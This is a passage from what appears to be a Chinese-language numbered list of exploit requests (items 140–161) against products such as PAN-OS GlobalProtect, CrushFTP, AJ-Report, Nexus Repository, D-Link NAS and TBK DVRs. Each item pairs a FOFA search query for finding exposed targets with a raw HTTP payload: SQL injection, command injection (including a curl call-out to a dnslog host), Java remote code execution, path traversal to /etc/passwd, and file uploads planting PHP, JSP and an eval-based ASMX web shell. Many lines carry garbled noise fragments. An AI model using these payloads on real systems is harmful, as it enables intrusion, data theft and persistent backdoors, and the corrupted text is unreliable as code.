Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 n9 V6 D4 k+ vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 t8 o% K5 H5 O9 g& ~. L9 A
Accept-Encoding: gzip, deflate, br; M! R9 ^/ D( J7 f+ T
Connection: close
1 x7 P( d7 @) ~0 F5 j/ p/ kCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
5 @) n& N4 \+ M3 Z4 D2 BUpgrade-Insecure-Requests: 1
' |( h2 Y3 t6 ?! }$ o1 Q& G
0 w" N" E- S% K; _5 T
& t7 E/ H9 i8 K: T140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. j0 C- K( p% z5 }1 t, u9 K
CVE-2024-2566
2 D6 ?. X/ Q7 h$ X+ f2 tFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% a$ b8 I9 E9 Y* L5 u6 X1 HGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.10 {' s( q8 Y9 _$ Z# B# _3 @
Host: x.x.x.x
9 ]/ `* j7 [! YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ l# O4 [3 ^& s# Q; ~9 K1 {3 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( M' s9 q8 g' x3 q- ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 v! d) l. a1 g( c. D P4 Z
Accept-Encoding: gzip, deflate, br
+ }0 D' r T5 }' ?Connection: close; K& t* n9 N* w0 J+ @0 j2 i0 N
Cookie: authcode=h8g9
& z+ X. m1 }- i" RUpgrade-Insecure-Requests: 1
! g- U! ]5 b1 v% t) M8 `7 ?
* B% K& I5 M" K5 F9 _( g# ` N# ?
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入- x1 G! T, ? G7 ]8 I& m% {' `3 R/ b
FOFA:body="指挥调度管理平台"
: C' D9 _2 u1 O D4 o* o NPOST /app/ext/ajax_users.php HTTP/1.1: ^$ V4 U* G! c; Y ~
Host: your-ip6 K e% @0 S8 G0 G
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
' M) u. ?: @% h0 EContent-Type: application/x-www-form-urlencoded
7 Z0 F) a8 }' _8 @& i! [" M3 \- |
) Q: Y" _& R- P
W+ E- }! b; [& u ]7 rdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -# S% V2 [4 S& [ w$ U1 o$ M5 x9 l, e
/ G$ g- [& z% A9 c+ x$ D$ Z! ~7 r7 e
2 p3 A$ p0 n) u4 w4 O142. CMSV6车辆监控平台系统中存在弱密码
4 c0 n( r+ p8 I8 y" N) dCVE-2024-29666
& \" l/ w9 V2 K8 X- [7 q& R: c( [FOFA:body="/808gps/"5 k: P/ _$ e/ x' h7 k' C! z/ e5 ] G
admin/admin5 z4 c' S6 e$ o1 S% |
143. Netis WF2780 v2.1.40144 远程命令执行
" N% A( M4 [8 C9 A5 aCVE-2024-25850
5 [) m8 v; l% Y% iFOFA:title='AP setup' && header='netis'- D) l4 ^* N+ _2 I" b/ }5 q
PAYLOAD5 ]) S/ L! E4 Z' ]) X& d- E
1 R, X- i) V3 l& G
144. D-Link nas_sharing.cgi 命令注入: ]9 ]5 C, C# F' a
FOFA:app="D_Link-DNS-ShareCenter"
, |. s: U: B- `9 R4 Qsystem参数用于传要执行的命令, }8 s" {/ g* c/ K: Q' H4 W: r
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.19 W; d- e% ^* T" j0 X
Host: x.x.x.x
* J3 j. L; v3 ]2 t( W$ HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.04 Z" O8 l. u" _5 H& `
Connection: close
1 r y" y' o j' [& X7 mAccept: */*$ ]" j" q: y' L) `0 Q' E
Accept-Language: en
+ K( U/ i. |5 C* cAccept-Encoding: gzip; }" E# k1 p) G- H3 F1 h, j
% T/ i. k% x" K. j
! U0 v' I0 V% G145. Palo Alto Networks PAN-OS GlobalProtect 命令注入6 ~4 [1 ^6 u- l1 M( B
CVE-2024-3400, c3 {- d9 {9 T% `. B
FOFA:icon_hash="-631559155"8 C2 S# J7 i6 |2 X$ ?
GET /global-protect/login.esp HTTP/1.1
r: Q9 v0 p- c+ r& {8 `+ DHost: 192.168.30.112:1005
G+ |) I4 O, d6 `$ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
; d! z% y2 X- J1 h/ k$ g) ]Connection: close8 n! z0 V+ Z' t" @% U( h) Q
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;& w {7 ~; {6 A* F1 d6 A8 k% b
Accept-Encoding: gzip5 h, Q7 H; F1 F# J: m
6 i% Q% F9 W: A) E, t- Z& {% G
3 Q- j- p* P" g! z
146. MajorDoMo thumb.php 未授权远程代码执行1 J' W, W' j* v( g0 c' S9 A2 O
CNVD-2024-02175; ? K( A% w3 z0 I- z; ]
FOFA:app="MajordomoSL"2 A; w7 c3 L0 L1 K/ ]" r$ T
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.12 n- d5 l+ X! W$ j( H1 Z- Y
Host: x.x.x.x1 j* C5 q# _0 V3 Z! I6 _! `- g' x4 h& s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
& d/ j/ p! D; E$ u0 YAccept-Charset: utf-8
6 D* G& b9 D* o+ t: HAccept-Encoding: gzip, deflate
( t; i& Q) |- V- S" m3 eConnection: close! P$ Q+ D) ~ C0 [9 C( M" U r; z
. F# s: A+ i. S, j+ m5 P% D& [4 e) ~7 s
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: g9 e1 p' E1 e1 j0 a4 }# U
CVE-2024-32399& Q" h7 s: [1 q# q
FOFA:body="RaidenMAILD"
8 A W8 f: D& `' H/ P: cGET /webeditor/../../../windows/win.ini HTTP/1.1
2 q0 H# M* n! }( I$ A; E, m' E' jHost: 127.0.0.1:812 j, r2 P6 k" S
Cache-Control: max-age=0
1 B% L& h; t! f( ^' _3 D# {- vConnection: close
# y* @5 o$ L3 w+ F+ w
?) K0 y- |* O5 G' Y. z" n! E) c( C- s
148. CrushFTP 认证绕过模板注入
& q* g- O4 P5 c2 ]; c- DCVE-2024-4040
' ^) ?( j( C" DFOFA:body="CrushFTP"4 r. R3 g, z, x
PAYLOAD% ~; G* F& B1 x5 E
$ n" T- W. \- v+ f. z! k% E/ C" i149. AJ-Report开源数据大屏存在远程命令执行
* Q) T6 b3 h: G( O4 L7 k4 PFOFA:title="AJ-Report"
9 v5 ~) T c) U8 }6 _- |! ]( o+ t# |1 T/ Z
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ Y5 s- f/ C- n9 X7 EHost: x.x.x.x
4 g; }+ `0 O( }: Z( P! q4 C; hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' z# ^9 z; O/ Q- U. p9 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 e+ `8 i, d7 P/ \9 UAccept-Encoding: gzip, deflate, br p7 K! C$ q- u, {" o0 L, n+ M, l
Accept-Language: zh-CN,zh;q=0.9+ P' [- {8 |3 r
Content-Type: application/json;charset=UTF-8
8 N( U: H$ I% M) N! Q3 w6 ^Connection: close
' v e/ }, Z8 W1 e2 r* P
5 {+ D! o8 e/ `# R{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}( ?; u- ~$ G/ ] y+ ?7 y
8 b F8 T1 u' h( t, ^3 p150. AJ-Report 1.4.0 认证绕过与远程代码执行
& |) b" A0 Y; {+ n+ X: h+ i, k( r5 kFOFA:title="AJ-Report"
9 A$ M% a2 Z0 b6 W- x2 {* ^, @POST /dataSetParam/verification;swagger-ui/ HTTP/1.11 `3 O) u- Y8 M0 y, q
Host: x.x.x.x3 M2 @4 C& a. U# P" J9 S# |! R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" K% }3 p! \# |, V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 T, ^! ?$ K5 j8 uAccept-Encoding: gzip, deflate, br3 _' |& H# m& M9 T; M, K# Z# J
Accept-Language: zh-CN,zh;q=0.9
/ d7 Z9 L9 D3 H8 N6 F5 T. SContent-Type: application/json;charset=UTF-8( a2 f/ I9 ]1 j5 ]5 i' z
Connection: close) {3 e3 q, k s! Z Q) h, j' X7 Q
Content-Length: 339
5 P y |+ l" T# l7 L( _( T
( S% ^9 k0 V; r{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}* K3 b) C6 \; `9 ]4 n* j7 w
2 p1 y+ e$ ]" @8 ]5 F1 G8 B) [. l9 g
151. AJ-Report 1.4.1 pageList sql注入1 F! y5 l& R+ ~1 R( N
FOFA:title="AJ-Report"8 }3 R8 z# _/ r6 s4 f6 a
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
+ }1 P+ F8 F+ ?! e( J' xHost: x.x.x.x
( E# Q B/ l e' \+ ~# G: `7 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# S3 S) {4 |& u aConnection: close
0 j5 _; U0 K* D) B S+ I: h* J1 w" aAccept-Encoding: gzip' B0 x3 p, U. f: g3 `8 }+ f& G: l
( B/ f+ M/ _* l( B/ s, X$ m7 x
/ X: e' z0 ~/ g% W* w) W) X152. Progress Kemp LoadMaster 远程命令执行. v/ ]+ R" c. `2 L7 \
CVE-2024-1212
+ w( t+ C$ X1 ?0 `: H( {4 p8 [- `% vLoadMaster <= 7.2.59.2 (GA)
: r- S( _# u( c; X" X4 l# K0 D+ fLoadMaster<=7.2.54.8 (LTSF)
: N- I% z; K! e, y N' d, ILoadMaster <= 7.2.48.10 (LTS)
2 D/ L, g1 L$ W9 l s! wFOFA:body="LoadMaster"
2 ^# d. p9 O f4 A. I( h9 y* i$ y/ pJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码3 n$ R! R! K8 w _2 s! J0 M
GET /access/set?param=enableapi&value=1 HTTP/1.1. S, N# Q: `$ b4 m) m
Host: x.x.x.x8 x) K# i0 J3 X+ u" v {& {1 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
; }9 i+ {1 ?# f) LConnection: close$ {0 C7 _/ c3 I" M! w
Accept: */*1 ?* \8 B/ ]2 _8 i5 |8 a
Accept-Language: en c$ p( x8 d% t( f4 V
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
# X% h! t+ X7 CAccept-Encoding: gzip
" J1 p6 {* D) O2 b- R' u4 q/ _
4 M+ I- Q3 S$ B& g( g6 l
0 R# t/ W) K4 C% _. K J; b3 T+ g153. gradio任意文件读取
0 ]+ H0 Y, ^8 A$ j2 m6 cCVE-2024-1561FOFA:body="__gradio_mode__"
2 b) B1 M r, S( V" q3 @第一步,请求/config文件获取componets的id
+ q- ^6 I# @% R" {' |http://x.x.x.x/config1 T4 f# |" Y1 W- u
/ B. T- u, i8 ?5 }8 ]% W6 K4 j( }* T" I N
第二步,将/etc/passwd的内容写入到一个临时文件; s) P. L+ _, ? b( I5 I8 o
POST /component_server HTTP/1.1
& H, N4 i+ S' o0 C. B+ ZHost: x.x.x.x
/ F S; y! k# j6 [* R& X. X q2 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
+ X7 [2 ~2 \. M0 o9 G) U7 d6 hConnection: close
5 A3 B6 _! i6 g" u( A( mContent-Length: 115
9 _; K/ D# \7 d: K. IContent-Type: application/json
- A8 p2 x* x2 v/ ^1 OAccept-Encoding: gzip( v3 U" z( a0 V$ Z! h$ F; r- K# a: P
( D# b' o3 X0 Z. _$ }
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
- x2 g/ ~' D# I0 E+ h. x1 L7 P K( g6 }2 ^
1 A m# q( u' ^1 G# w2 q9 x第三步访问
8 m c- W3 r5 Q5 ^, f' v' ~http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd3 q/ \0 j9 ^& A. G
8 Y- u3 @( u- x2 w/ ~7 @# E
$ x9 U B: ]( ?154. 天维尔消防救援作战调度平台 SQL注入: l! J) m" b$ Z& R4 m
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
2 {. z E7 I' a% D8 J1 ?/ OPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
/ W. g" A: `( H5 x. oHost: x.x.x.x
0 L L- u! f O$ [* O# |Content-Length: 106! f# D7 f5 _0 d5 x7 Z. Q* m; i
Cache-Control: max-age=0! ?* e/ v9 e4 L2 l5 K1 M7 U# n
Upgrade-Insecure-Requests: 1( s/ V1 Z' G: _1 W( u& I
Origin: http://x.x.x.x/ N. \: {7 d. ?/ W% x
Content-Type: application/json
* j. ^; Q/ P7 I5 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) B% n/ t3 _" I O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 a: P: \! f W) y
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
% _$ T; P- o! A* Z/ pAccept-Encoding: gzip, deflate; |' m. ^% X" l
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 g! z! e2 R# F2 {+ g
Connection: close
1 }3 Y% j* F7 S0 D) E& l( S3 E/ [6 t9 f4 n) A n9 m* M
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
- C! ~! I& }6 Q5 {. |' x7 K% f3 {, A, t- m" s3 H7 G
/ C6 i! \* R; n* ]
155. 六零导航页 file.php 任意文件上传
2 U3 v$ k) E+ D3 LCVE-2024-349828 H9 X" k5 w( j+ x% M: s
FOFA:title=="上网导航 - LyLme Spage"2 t; U) F2 y2 c7 X, w7 r- A
POST /include/file.php HTTP/1.1
+ e0 P+ C8 {7 v% b" Y1 kHost: x.x.x.x
- T2 \) E$ @' RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0& }7 q' O) i$ |( _( M- n# K; d
Connection: close+ T1 v( c* `. W6 X$ ?
Content-Length: 232
9 E1 C* _+ @$ F7 V9 dAccept: application/json, text/javascript, */*; q=0.01
2 V9 z; S) X+ H4 \4 LAccept-Encoding: gzip, deflate, br* o. A6 H* L6 ]# f# n( y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' U2 l7 H9 [2 k1 x5 E
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f h( V, K' z z% `8 w. c. ^
X-Requested-With: XMLHttpRequest4 ~- _2 H2 ^$ k8 O8 K
0 Z) [. E: ^( ^- T; T" i Y-----------------------------qttl7vemrsold314zg0f
" ]; H$ p# k7 Z: V3 m8 e. AContent-Disposition: form-data; name="file"; filename="test.php" s' x/ _4 [5 c6 Z; l
Content-Type: image/png
4 N& C- [- A: r+ X
" }. S) p6 w8 r# q<?php phpinfo();unlink(__FILE__);?>' Y; T+ P' @: |& |& ?
-----------------------------qttl7vemrsold314zg0f--
& S- n4 n% s7 F' Z7 c' q: u
, f/ w* e0 m. |9 y K% p/ U/ W7 D" o5 P9 R* C/ b" I5 p9 a
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php9 A: }4 Z; W/ i) o
" f* x# o, N+ a& o3 D! d" R# S156. TBK DVR-4104/DVR-4216 操作系统命令注入1 c0 `5 n! @0 B+ n
CVE-2024-37210 F) m) E! e: `. L: i% [
FOFA:"Location: /login.rsp" Z7 S. B2 S' T: z Y
·TBK DVR-4104% d p5 Q) e5 u6 f* ~$ b7 V
·TBK DVR-4216
% i; m) m7 `5 R8 J2 Ecurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# N6 [, x0 p! U- r G9 k
B2 E4 a% @2 h9 h6 q V, [ e6 K. m2 J; P1 f" @
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.18 v& u; |' J8 m% Q
Host: x.x.x.x
4 x0 N6 m- z$ ~; G- GUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 Y) y! Q- z! E" g1 \( W5 w
Connection: close. s8 T) Y7 L1 a4 l( m' n- a& N j( e
Content-Length: 0
- v, g% |$ T3 Z4 `/ N. P, t, OCookie: uid=1$ p7 `) f2 m$ j: Q8 B
Accept-Encoding: gzip7 ^# Q! X5 J8 x# o4 s8 t, z1 \6 n
- J' T* a" P3 r" N7 d+ _
/ t9 D6 T7 z' H' v+ g157. 美特CRM upload.jsp 任意文件上传7 U* b( q: k; J
CNVD-2023-06971
0 o, m3 ^, _# [# XFOFA:body="/common/scripts/basic.js"1 A6 S8 ]8 Y, ~" C8 b9 W
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.13 r/ `# L8 ?, t( g
Host: x.x.x.x. X5 }4 Y6 c7 `1 a7 e% X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 w9 a1 z$ b9 h, m. c7 Q- K0 _
Content-Length: 7091 S$ N- C ]3 b- k% A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 y5 Y3 A' C* b0 a E$ @7 ZAccept-Encoding: gzip, deflate: q0 O) X5 R7 ?- H" }
Accept-Language: zh-CN,zh;q=0.9; `: m4 P; ^0 o, a. }$ W( C
Cache-Control: max-age=0- ?8 t) [) r# e6 C' j- x# ~
Connection: close/ X: F- v3 ~, G. q6 ]4 D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN( J/ D) |/ g4 k/ e0 e8 h! `8 t
Upgrade-Insecure-Requests: 1
; P# z$ I* @' G) v* ? ?' K+ v2 J5 f3 {- w) m$ V
------WebKitFormBoundary1imovELzPsfzp5dN. Y0 U. E# J& u3 \- {/ h3 p
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp". z- E5 d" u2 p) O
Content-Type: application/octet-stream9 N1 y6 t t" Y; [6 o+ L" d2 D
; w, F3 ]8 {+ {# {9 r1 Gnyhelxrutzwhrsvsrafb9 n" V8 v- R! C1 r) J0 t! j& B
------WebKitFormBoundary1imovELzPsfzp5dN
* S z9 E1 _- K4 Y" s+ `! fContent-Disposition: form-data; name="key"/ F8 `7 p" V; L+ W
0 _% X- b& K4 g& p3 |
null, ^0 {' A! \* }* d0 [# p& K# \
------WebKitFormBoundary1imovELzPsfzp5dN4 U4 C" y, Z6 q# b' T- y
Content-Disposition: form-data; name="form"0 d! L% b/ D% D( W2 X* H4 ?' L+ @
2 b1 k6 S+ O( J4 o0 [null
% M: G; e; g7 U( {2 g& [) G------WebKitFormBoundary1imovELzPsfzp5dN
$ M" S/ l3 X6 n* }& vContent-Disposition: form-data; name="field"
$ P8 W. t: }3 h) b9 G# t, z
" t% M2 Z& {" }; r9 u y! fnull5 C3 S# K/ n0 f$ e
------WebKitFormBoundary1imovELzPsfzp5dN4 o j: v+ W) f7 V
Content-Disposition: form-data; name="filetitile"
( Q0 ?- `- }% w- f9 t- C+ z; b1 S! e
null
1 P, ]5 I% C9 e p; M* l9 S------WebKitFormBoundary1imovELzPsfzp5dN
/ q% D$ j" i( o) |& q& Q# b7 }Content-Disposition: form-data; name="filefolder"
% S* M: T' C5 G k" \) p+ f. r7 Y: ^- p* c+ Q
null9 F. z: o m7 y! C# z4 b
------WebKitFormBoundary1imovELzPsfzp5dN--
5 H; ]. p/ l2 j6 t& |3 B8 i o6 I& H2 x5 P9 w7 v2 U! g; M+ z2 M
2 w: {9 d7 R+ c" U/ fhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp1 y& \$ D5 u9 C" M
* t* |. g3 w2 i6 K A+ G \- o, f158. Mura-CMS-processAsyncObject存在SQL注入4 k- ]5 E6 b4 w5 ?. J; X
CVE-2024-32640/ u+ Y, \% A& b& \7 r
FOFA:"Generator: Masa CMS"
+ D$ `. _% c& W- p3 K4 r7 NPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1' Z* ^" O! J8 g# M4 U% p; [/ @
Host: {{Hostname}}
7 L& d" Z* ^! J+ \Content-Type: application/x-www-form-urlencoded' @% S5 P) K( N, _2 J% O
" X; n' M$ ^. ?( Eobject=displayregion&contenthistid=x\'&previewid=1
. p8 V" t' b* Z. l: a& i3 s& d6 J; \/ M$ y% Q* I3 Z
2 o; D, K9 J! L; f8 h8 k159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
( L, z6 D( ]1 d" ^! U6 B4 |' FFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
+ v! G# f4 F' y9 h2 O" R* S; v( \2 YPOST /webservices/WebJobUpload.asmx HTTP/1.1* Z' v8 b: F! H' D( C
Host: x.x.x.x# f6 L. f2 r, o R0 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
6 i8 U9 r: U FContent-Length: 10808 Y( l% u4 r7 ]* C- k
Accept-Encoding: gzip, deflate" P0 D9 [ V# q8 J; d, v% `
Connection: close
1 }$ [# i$ t8 Q9 UContent-Type: text/xml; charset=utf-8
/ }6 {* g' r0 v" j5 V7 SSoapaction: "http://rainier/jobUpload"
O& U3 D# t* ^$ @! e* {) a* G5 [
8 s+ |% n9 _5 o<?xml version="1.0" encoding="utf-8"?>5 }2 C6 o& x- \: F6 o) i
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">) j4 A( u9 f/ N% z
<soap:Body>) \7 v. N/ {2 q# S
<jobUpload xmlns="http://rainier">
/ U4 v6 @3 Z6 z1 k5 T6 B# ~8 B1 K<vcode>1</vcode>( P# C! Z8 A* W
<subFolder></subFolder>
* [9 t- J! d. {% x4 N4 y+ U<fileName>abcrce.asmx</fileName>
7 h8 e, e% k+ R! r. i+ R+ F* Z" R<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>6 P' c7 a3 p+ R4 r( R
</jobUpload>2 V2 j0 f/ r' e2 O: O. r
</soap:Body>
4 M& i$ W' { {: R</soap:Envelope>
) _- j$ P& ~ a( w& H# `; S: s6 t _9 I$ R% E# d- ]- F: `
; k( g4 i; Z& h6 [
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")! S" {" P1 ?3 H7 H
3 f( f1 M0 I( w8 L/ Y4 K9 n0 b& r5 ^1 R$ Y& N) _' @1 _
160. Sonatype Nexus Repository 3目录遍历与文件读取
* G6 K6 j" Y% u8 C8 UCVE-2024-4956
( {' [. K8 y* y. ^5 E9 M' t/ {/ k+ EFOFA:title="Nexus Repository Manager"
4 ~5 H# R+ w) k. i; v( u. {GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
6 Z+ M7 m: |6 }" B3 d |Host: x.x.x.x+ o% s9 S5 Q/ n$ _$ Z9 G
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
+ l4 W X4 ?" V1 q+ @ o% l8 |Connection: close) y* w' G8 x3 x# y+ _6 i( H
Accept: */*
/ b# i2 S9 K7 i0 HAccept-Language: en6 ?% a0 _) V# w$ s! @$ e- m
Accept-Encoding: gzip
0 Q" I$ v- r; m' N
7 g/ ?+ \+ ?6 a1 y: k- O; W: c
4 b6 o% o1 ^; Q9 c7 [! R) c161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
: Q) [: K' w, TFOFA:body="/KT_Css/qd_defaul.css"
' n: t( V M+ p: G- T$ ]: c7 E第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
; \+ m0 V9 x# U, p- b# X& S0 J0 {POST /Webservice.asmx HTTP/1.1
. _4 a' j* b. ]2 k0 gHost: x.x.x.x5 ]) j+ Q! p2 q% h" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
1 \5 v9 }5 d% |6 I/ e% q1 R$ w. O) v$ FConnection: close# |2 Y# y9 k, s- F% b
Content-Length: 445
9 f6 U) F4 L8 u4 P$ j# oContent-Type: text/xml
! p0 F% b; N# w& J5 M& U5 ]4 ?) ^Accept-Encoding: gzip+ e/ L( G. B$ L6 C8 p
S8 N" Z# v+ G# E" o2 Q# a
<?xml version="1.0" encoding="utf-8"?>
6 O$ i8 D% B0 Q& \<soap:Envelope xmlns:xsi="' g( B. ]: p$ p6 n0 h
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
q/ m2 H0 l8 L4 Qxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">$ n: q# g) m2 t3 J8 k" z( h. u
<soap:Body>
+ F2 B& C' E) Q0 [/ O<UploadResume xmlns="http://tempuri.org/">1 t9 i5 }* D6 J8 a
<ip>1</ip>
9 {/ g$ j9 T! g1 V5 v<fileName>../../../../dizxdell.aspx</fileName>7 W& v1 g' ?4 y u
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
